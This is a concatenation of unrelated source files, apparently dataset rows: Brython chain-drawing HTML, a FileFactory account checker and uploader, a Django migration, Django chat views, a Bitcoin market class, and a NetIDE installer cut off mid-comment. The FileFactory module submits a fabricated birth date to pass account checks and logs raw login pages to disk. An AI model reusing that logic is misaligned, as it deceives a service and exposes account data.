<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-40, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 B
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 右上垂直向下單元
x7, y7 = mychain.basic_rot(x6, y6, -90)
# 右斜 240 度
x8, y8 = mychain.basic_rot(x7, y7, 210)
# 中間水平
mychain.basic(x8, y8, x2, y2)
# 右下斜 -30 度
x10, y10 = mychain.basic_rot(x8, y8, -30)
# 右下垂直向下單元
x11, y11 = mychain.basic_rot(x10, y10, -90)
# 右下斜 240 度
x12, y12 = mychain.basic_rot(x11, y11, 210)
# 水平接回起點
mychain.basic(x12,y12, 0, 0, color="green")
cgo.setWorldCoords(-107.5, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-50, -250, 500, 500)
# 畫 C
# 上半部
# 左邊中間垂直起點, 圓心位於線段中央, y 方向再向上平移兩個鏈條圓心距單位
x1, y1 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), 90)
# 上方轉 80 度
x2, y2 = mychain.basic_rot(x1, y1, 80)
# 上方轉 30 度
x3, y3 = mychain.basic_rot(x2, y2, 30)
# 上方水平
x4, y4 = mychain.basic_rot(x3, y3, 0)
# 下半部, 從起點開始 -80 度
x5, y5 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), -80)
# 下斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 下方水平單元
x7, y7 = mychain.basic_rot(x6, y6, -0, color="green")
cgo.setWorldCoords(-55, -250, 500, 500)
# 畫 D
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0+65*3, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -40 度
x6, y6 = mychain.basic_rot(x5, y5, -40)
x7, y7 = mychain.basic_rot(x6, y6, -60)
# 右中垂直向下單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
# -120 度
x9, y9 = mychain.basic_rot(x8, y8, -120)
# -140
x10, y10 = mychain.basic_rot(x9, y9, -140)
# 水平接回原點
mychain.basic(x10, y10, 0+65*3, 0, color="green")
</script>
</body></html>
'''
return outstring
@bg11_40323247.route('/task47_3')
def task47_3():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-250, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
# 將繪製鏈條輪廓的內容寫成 class 物件
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 B
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 右上垂直向下單元
x7, y7 = mychain.basic_rot(x6, y6, -90)
# 右斜 240 度
x8, y8 = mychain.basic_rot(x7, y7, 210)
# 中間水平
mychain.basic(x8, y8, x2, y2)
# 右下斜 -30 度
x10, y10 = mychain.basic_rot(x8, y8, -30)
# 右下垂直向下單元
x11, y11 = mychain.basic_rot(x10, y10, -90)
# 右下斜 240 度
x12, y12 = mychain.basic_rot(x11, y11, 210)
# 水平接回起點
mychain.basic(x12,y12, 0, 0, color="green")
cgo.setWorldCoords(-247.5, -350, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-55, -50, 500, 500)
# 畫 D
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0+65*3, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -40 度
x6, y6 = mychain.basic_rot(x5, y5, -40)
x7, y7 = mychain.basic_rot(x6, y6, -60)
# 右中垂直向下單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
# -120 度
x9, y9 = mychain.basic_rot(x8, y8, -120)
# -140
x10, y10 = mychain.basic_rot(x9, y9, -140)
# 水平接回原點
mychain.basic(x10, y10, 0+65*3, 0, color="green")
cgo.setWorldCoords(-120, -150, 500, 500)
# 畫 C
# 上半部
# 左邊中間垂直起點, 圓心位於線段中央, y 方向再向上平移兩個鏈條圓心距單位
x1, y1 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), 90)
# 上方轉 80 度
x2, y2 = mychain.basic_rot(x1, y1, 80)
# 上方轉 30 度
x3, y3 = mychain.basic_rot(x2, y2, 30)
# 上方水平
x4, y4 = mychain.basic_rot(x3, y3, 0)
# 下半部, 從起點開始 -80 度
x5, y5 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), -80)
# 下斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 下方水平單元
x7, y7 = mychain.basic_rot(x6, y6, -0, color="green")
</script>
</body></html>
'''
return outstring
|
agpl-3.0
| -2,091,752,563,251,680,500 | 27.446708 | 110 | 0.607912 | false | 1.908011 | false | false | false |
oczkers/gdown
|
gdown/modules/filefactory.py
|
1
|
5668
|
# -*- coding: utf-8 -*-
"""
gdown.modules.filefactory
~~~~~~~~~~~~~~~~~~~
This module contains handlers for filefactory.
"""
import re
from datetime import datetime
from dateutil import parser
from time import sleep
from ..module import browser, acc_info_template
from ..exceptions import ModuleError
def upload(username, passwd, filename):
"""Returns uploaded file url."""
r = browser()
r.post('http://www.filefactory.com/member/signin.php', {'loginEmail': username, 'loginPassword': passwd, 'Submit': 'Sign In'}) # login to get ff_membership cookie
# host = r.get('http://www.filefactory.com/servers.php?single=1').text # get best server to upload
host = 'http://upload.filefactory.com/upload.php' # always returning the same url (?)
viewhash = re.search('<viewhash>(.+)</viewhash>', r.get('http://www.filefactory.com/upload/upload_flash_begin.php?files=1').text).group(1) # get viewhash
r.post('%s/upload_flash.php?viewhash=%s' % (host, viewhash), {'Filename': filename, 'Upload': 'Submit Query'}, files={'file': open(filename, 'rb')}).text # upload
return 'http://www.filefactory.com/file/%s/n/%s' % (viewhash, filename)
def accInfo(username, passwd, date_birth=False, proxy=False):
"""Returns account info."""
acc_info = acc_info_template()
r = browser(proxy)
data = {'loginEmail': username,
'loginPassword': passwd,
'Submit': 'Sign In'}
content = r.post('https://www.filefactory.com/member/signin.php', data=data).text
open('gdown.log', 'w').write(content)
# TODO: language
if r.cookies['locale'] != 'en_US.utf8':
print('language changing to en')
data = {'func': 'locale',
# 'redirect': '/account/',
'settingsLanguage': 'en_US.utf8',
'Submit': ''}
content = r.post('http://filefactory.com/account/index.php', data=data).text
open('gdown1.log', 'w').write(content)
if 'What is your date of birth?' in content:
if not date_birth:
# raise ModuleError('Birth date not set.')
acc_info['status'] = 'free'
return acc_info
print('date birth',) # DEBUG
content = r.post('https://www.filefactory.com/member/setdob.php', {'newDobMonth': '1', 'newDobDay': '1', 'newDobYear': '1970', 'Submit': 'Continue'}).text
open('gdown.log', 'w').write(content)
if 'Please Update your Password' in content:
if not date_birth:
# raise ModuleError('Password has to be updated.')
acc_info['status'] = 'free'
return acc_info
print('password resetting',) # DEBUG
content = r.post('https://www.filefactory.com/member/setpwd.php', {'dobMonth': '1', 'dobDay': '1', 'dobYear': '1970', 'newPassword': passwd, 'Submit': 'Continue'}).text
open('gdown.log', 'w').write(content)
if 'Your Date of Birth was incorrect.' in content:
print('wrong date birth',) # DEBUG
acc_info['status'] = 'free'
return acc_info
elif 'You have been signed out of your account due to a change being made to one of your core account settings. Please sign in again.' in content or 'Your password has been changed successfully' in content:
print('relogging after password reset',) # DEBUG
sleep(5)
return accInfo(username, passwd)
if 'Review Acceptable Use Policy' in content: # new policy
print('new policy')
        content = r.post('https://www.filefactory.com/member/settos.php', data={'agree': '1', 'Submit': 'I understand'}).text
if 'Account Pending Deletion' in content or 'The Email Address submitted was invalid' in content or 'The email address or password you have entered is incorrect.' in content:
acc_info['status'] = 'deleted'
return acc_info
elif 'Too Many Failed Sign In Attempts' in content:
# raise ModuleError('ip banned')
# print('ip banned') # DEBUG
sleep(30)
return accInfo(username=username, passwd=passwd, proxy=proxy)
content = r.get('https://www.filefactory.com/account/').text
if '<strong>Free Member</strong>' in content or '<strong>Kostenloses Mitglied</strong>' in content or '<strong>Membro Gratuito</strong>' in content:
acc_info['status'] = 'free'
return acc_info
elif any(i in content for i in ('The account you are trying to use has been deleted.', 'This account has been automatically suspended due to account sharing.', 'The account you have tried to sign into is pending deletion.', 'Your FileFactory Account Has Been Temporarily Suspended')):
acc_info['status'] = 'blocked'
return acc_info
elif any(i in content for i in ('The email or password you have entered is incorrect', 'The email or password wre invalid. Please try again.', 'The Email Address submitted was invalid', 'The email address or password you have entered is incorrect.')):
acc_info['status'] = 'deleted'
return acc_info
elif 'title="Premium valid until:' in content:
acc_info['status'] = 'premium'
acc_info['expire_date'] = parser.parse(re.search('title="Premium valid until: <strong>(.+?)</strong>">', content).group(1))
return acc_info
elif "Congratulations! You're a FileFactory Lifetime member. We value your loyalty and support." in content or '<strong>Lifetime</strong>' in content:
acc_info['status'] = 'premium'
acc_info['expire_date'] = datetime.max
return acc_info
else:
open('gdown.log', 'w').write(content)
raise ModuleError('Unknown error, full log in gdown.log')
|
gpl-3.0
| -7,907,263,448,037,048,000 | 50.063063 | 288 | 0.638497 | false | 3.751158 | false | false | false |
parksandwildlife/wastd
|
occurrence/migrations/0034_auto_20190507_1222.py
|
1
|
2843
|
# Generated by Django 2.1.7 on 2019-05-07 04:22
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('occurrence', '0033_auto_20190506_1347'),
]
operations = [
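        # Create the AnimalSex lookup table and attach it to AnimalObservation via a nullable foreign key.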
migrations.CreateModel(
name='AnimalSex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.SlugField(help_text='A unique, url-safe code.', max_length=500, unique=True, verbose_name='Code')),
('label', models.CharField(blank=True, help_text='A human-readable, self-explanatory label.', max_length=500, null=True, verbose_name='Label')),
('description', models.TextField(blank=True, help_text='A comprehensive description.', null=True, verbose_name='Description')),
],
options={
'ordering': ['code'],
'abstract': False,
},
),
migrations.AlterModelOptions(
name='animalobservation',
options={'verbose_name': 'Animal Observation', 'verbose_name_plural': 'Animal Observations'},
),
migrations.AlterModelOptions(
name='habitatcomposition',
options={'verbose_name': 'Habitat Composition', 'verbose_name_plural': 'Habitat Compositions'},
),
migrations.AlterModelOptions(
name='habitatcondition',
options={'verbose_name': 'Habitat Condition', 'verbose_name_plural': 'Habitat Conditions'},
),
migrations.AlterModelOptions(
name='physicalsample',
options={'verbose_name': 'Physical Sample', 'verbose_name_plural': 'Physical Samples'},
),
migrations.AlterModelOptions(
name='plantcount',
options={'verbose_name': 'Plant Count', 'verbose_name_plural': 'Plant Counts'},
),
migrations.AlterModelOptions(
name='vegetationclassification',
options={'verbose_name': 'Vegetation Classification', 'verbose_name_plural': 'Vegetation Classifications'},
),
migrations.AlterField(
model_name='areaencounter',
name='source_id',
field=models.CharField(default=uuid.UUID('b6e9dd1a-707f-11e9-a870-ecf4bb19b5fc'), help_text='The ID of the record in the original source, if available.', max_length=1000, verbose_name='Source ID'),
),
migrations.AddField(
model_name='animalobservation',
name='sex',
field=models.ForeignKey(blank=True, help_text='The sex of the primary observed animal.', null=True, on_delete=django.db.models.deletion.CASCADE, to='occurrence.AnimalSex', verbose_name='Animal Sex'),
),
]
|
mit
| 1,233,837,931,145,389,300 | 44.854839 | 211 | 0.610623 | false | 4.12627 | false | false | false |
willre/homework
|
day21-22/webChat/webChat_master/views.py
|
1
|
3580
|
# -*- coding:utf-8 -*-
import json
import Queue
import time
from django.shortcuts import render,HttpResponseRedirect,HttpResponse
from django.contrib.auth import authenticate,login,logout
from webChat_forms.loginFrom import userLoginFrom
from django.contrib.auth.decorators import login_required
from webChat_models import models
# Create your views here.
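# In-memory message queues keyed by userprofile id (string); messages are lost when the process restarts.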
GLOBAL_MQ = {}
def indexPage(request):
loginFrom = userLoginFrom()
return render(request,"index.html",{"loginFrom":loginFrom})
@login_required
def chatPage(request):
return render(request,"chat.html")
def loadContacts(request):
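    # Build the contact list (individual friends and groups) for the logged-in user and return it as JSON.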
contact_dic = {}
url_path = request.path
print url_path,"asd"
contact_dic["single"] = list(request.user.userprofile.friends.select_related().values("id","name","description"))
contact_dic["group"] = list(request.user.userprofile.user_group_set.select_related().values("id","name","description"))
print json.dumps( contact_dic)
return HttpResponse(json.dumps(contact_dic))
def new_msg(request):
    # The user POSTs a new message to the server
if request.method=="POST":
data = json.loads(request.POST.get('data'))
send_to_user_id = data['to']
local_time = time.strftime("%Y-%m-%d %X",time.localtime(time.time()))
        data['timestamp'] = local_time  # set the timestamp
print data
if data["contact_type"] == "group":
group_obj = models.User_Group.objects.get(id=send_to_user_id)
for member in group_obj.members.select_related():
print member.id,data["from"]
if str(member.id) not in GLOBAL_MQ:
GLOBAL_MQ[str(member.id)] = Queue.Queue()
if str(member.id) != data["from"]:
GLOBAL_MQ[str(member.id)].put(data)
else:
if send_to_user_id not in GLOBAL_MQ:
GLOBAL_MQ[send_to_user_id] = Queue.Queue()
print "POST",send_to_user_id,data
GLOBAL_MQ[send_to_user_id].put(data)
return HttpResponse(local_time)
    # The user GETs pending messages from the server
if request.method=="GET":
request_user_id = str(request.user.userprofile.id)
msg_lists = []
if request_user_id in GLOBAL_MQ:
stored_msg_nums = GLOBAL_MQ[request_user_id].qsize()
if stored_msg_nums ==0: #no new msgs
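                # Long-poll: block for up to 15 seconds waiting for a new message to arrive.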
try:
msg = GLOBAL_MQ[request_user_id].get(timeout=15)
msg_lists.append(msg)
# msg_lists.append(GLOBAL_MQ[request_user_id].get(timeout=15))
except Exception as e:
print("err:",e)
for i in range(stored_msg_nums):
msg_lists.append(GLOBAL_MQ[request_user_id].get())
else:
GLOBAL_MQ[str(request.user.userprofile.id)] = Queue.Queue()
print "GETMsg",msg_lists
return HttpResponse(json.dumps(msg_lists))
def userLogin(request):
loginFrom = userLoginFrom()
print(request.POST)
err_msg =''
if request.method == "POST":
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username,password=password)
if user is not None:
login(request,user)
return HttpResponseRedirect('/chat/#contacts')
else:
err_msg = "Wrong username or password!"
return render(request,'index.html',{"loginFrom":loginFrom,'err_msg':err_msg})
def userLogout(request):
logout(request)
return HttpResponseRedirect('/')
|
gpl-2.0
| 4,381,744,721,565,426,700 | 30.90991 | 123 | 0.612931 | false | 3.666667 | false | false | false |
taariq/btcmarketdata
|
btcdata/public_markets/market.py
|
1
|
1991
|
import time
import urllib.request
import urllib.error
import urllib.parse
import config
import logging
from fiatconverter import FiatConverter
class Market(object):
def __init__(self, currency):
self.name = self.__class__.__name__
self.currency = currency
self.depth_updated = 0
self.update_rate = 60
self.fc = FiatConverter()
self.fc.update()
def get_depth(self):
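        # Return the cached order book, refreshing it when it is older than update_rate seconds.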
timediff = time.time() - self.depth_updated
if timediff > self.update_rate:
self.ask_update_depth()
timediff = time.time() - self.depth_updated
if timediff > config.market_expiration_time:
logging.warn('Market: %s order book is expired' % self.name)
self.depth = {'asks': [{'price': 0, 'amount': 0}], 'bids': [
{'price': 0, 'amount': 0}]}
return self.depth
def convert_to_usd(self):
if self.currency == "USD":
return
for direction in ("asks", "bids"):
for order in self.depth[direction]:
order["price"] = self.fc.convert(order["price"], self.currency, "USD")
def ask_update_depth(self):
try:
self.update_depth()
self.convert_to_usd()
self.depth_updated = time.time()
except (urllib.error.HTTPError, urllib.error.URLError) as e:
logging.error("HTTPError, can't update market: %s - %s" % (self.name, str(e)))
except Exception as e:
logging.error("Can't update market: %s - %s" % (self.name, str(e)))
def get_ticker(self):
depth = self.get_depth()
res = {'ask': 0, 'bid': 0}
if len(depth['asks']) > 0 and len(depth["bids"]) > 0:
res = {'ask': depth['asks'][0],
'bid': depth['bids'][0]}
return res
## Abstract methods
def update_depth(self):
pass
def buy(self, price, amount):
pass
def sell(self, price, amount):
pass
|
mit
| 2,434,534,309,840,194,600 | 30.603175 | 90 | 0.553993 | false | 3.742481 | false | false | false |
fp7-netide/Engine
|
loader/loader/installer.py
|
1
|
8381
|
"""
Copyright (c) 2015, NetIDE Consortium (Create-Net (CN), Telefonica Investigacion Y Desarrollo SA (TID), Fujitsu
Technology Solutions GmbH (FTS), Thales Communications & Security SAS (THALES), Fundacion Imdea Networks (IMDEA),
Universitaet Paderborn (UPB), Intel Research & Innovation Ireland Ltd (IRIIL), Fraunhofer-Institut für
Produktionstechnologie (IPT), Telcaria Ideas SL (TELCA) )
All rights reserved. This program and the accompanying materials
are made available under the terms of the Eclipse Public License v1.0
which accompanies this distribution, and is available at
http://www.eclipse.org/legal/epl-v10.html
Authors:
Gregor Best, [email protected]
"""
import json
import logging
import os
import platform
import requests
import stat
import subprocess as sp
import sys
import tempfile
from subprocess import call
from loader import environment
from loader import util
from loader.package import Package
# XXX make this configurable
install_package_command = "sudo apt-get install --yes {}"
class InstallException(Exception): pass
def do_server_install(pkg):
logging.debug("Doing server install for '{}' now".format(pkg))
prefix = os.path.expanduser("~")
with util.TempDir("netide-server-install") as t:
p = Package(pkg, t)
if not p.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
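        # Set up the Ansible virtual environment (see virtualEnv_Ansible_Install.sh) before running the server playbook below.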
call(["./virtualEnv_Ansible_Install.sh"])
if "server" not in p.config:
raise InstallException('"server" section missing from configuration!')
conf = p.config["server"]
util.editPlaybookServer(conf)
if "host" in conf and platform.node() != conf["host"] and conf["host"] != "localhost":
raise InstallException("Attempted server installation on host {} (!= {})".format(platform.node(), conf["host"]))
# with open("Playbook_Setup/sever.yml", "w") as serverYml:
# serverYml.write("--- \n - name: install prereq for all hosts \n hosts: localhost \n roles: - prereq - core \n ...")
#install core and engine on server (usually localhost)
#read p.config[server] and add server to site.yml
call(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteServer.yml")])
#Check the rest of system requirements
logging.debug("Checking system requirements for {}".format(pkg))
if not p.check_no_hw_sysreq():
logging.error("Requirements for package {} not met".format(pkg))
return 2
def do_client_installs(pkgpath, dataroot):
"Dispatches installation requests to client machines after gaining a foothold on them. Requires passwordless SSH access to \
client machines and passwordless root via sudo on client machines"
with util.TempDir("netide-client-installs") as t:
pkg = Package(pkgpath, t)
if not pkg.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
clients = pkg.get_clients()
#controller = pkg.controllers
#print("controller: ")
#print(controller)
#for n in controller:
# print("instance of controller: ")
# print(n)
# for i in controller[n]:
# print(i)
util.editPlaybookClient(pkg)
util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteClient.yml")])
#===============================================================================
# util.write_ansible_hosts(clients, os.path.join(t, "ansible-hosts"))
#
# tasks = []
#
# # Can't use `synchronize' here because that doesn't play nice with ssh options
# tasks.append({
# "name": "Copy NetIDE loader",
# "copy": {
# "dest": '{{ansible_user_dir}}/netide-loader-tmp',
# "src" : os.getcwd()}})
#
# # We need to do this dance because `copy' copies to a subdir unless
# # `src' ends with a '/', in which case it doesn't work at all (tries
# # to write to '/' instead)
# tasks.append({
# "shell": "mv {{ansible_user_dir}}/netide-loader-tmp/loader {{ansible_user_dir}}/netide-loader",
# "args": {"creates": "{{ansible_user_dir}}/netide-loader"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader-tmp", "state": "absent"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader/netideloader.py", "mode": "ugo+rx"}})
#
# tasks.append({
# "name": "Bootstrap NetIDE loader",
# "shell": "bash ./setup.sh",
# "args": { "chdir": "{{ansible_user_dir}}/netide-loader" }})
#
# #is already cloned...
# tasks.append({
# "name": "Clone IDE repository",
# "git": {
# "repo": "http://github.com/fp7-netide/IDE.git",
# "dest": "{{ansible_user_dir}}/IDE",
# "version": "development"}})
#
# #has been done in setup server
# tasks.append({
# "name": "Install Engine",
# "shell": "bash {{ansible_user_dir}}/IDE/plugins/eu.netide.configuration.launcher/scripts/install_engine.sh"})
# #add creates:
# tasks.append({
# "file": {
# "path": dataroot,
# "state": "directory"}})
#
# tasks.append({
# "name": "Register Package checksum",
# "copy": {
# "content": json.dumps({"cksum": pkg.cksum}, indent=2),
# "dest": os.path.join(dataroot, "controllers.json")}})
#
# playbook = [{"hosts": "clients", "tasks": tasks}]
#
# #use new role system here !
# for c in clients:
#
# ctasks = []
#
# apps = []
# # Collect controllers per client machine and collect applications
# for con in pkg.controllers_for_node(c[0]):
# apps.extend(con.applications)
# cname = con.__name__.lower()
# if cname not in ["ryu", "floodlight", "odl", "pox", "pyretic"]:
# raise InstallException("Don't know how to install controller {}".format(cname))
#
# script = ["{{ansible_user_dir}}", "IDE", "plugins", "eu.netide.configuration.launcher", "scripts"]
# script.append("install_{}.sh".format(cname))
#
# ctasks.append({
# "name": "install controller {}".format(cname),
# "shell": "bash {}".format(os.path.join(*script)),
# "args": {"chdir": "{{ansible_user_dir}}"}})
#
# # Install application dependencies
# # XXX: ugly :/
# # XXX: libraries
# for a in apps:
# reqs = a.metadata.get("requirements", {}).get("Software", {})
#
# # Languages
# for l in reqs.get("Languages", {}):
# if l["name"] == "python":
# if l["version"].startswith("3"):
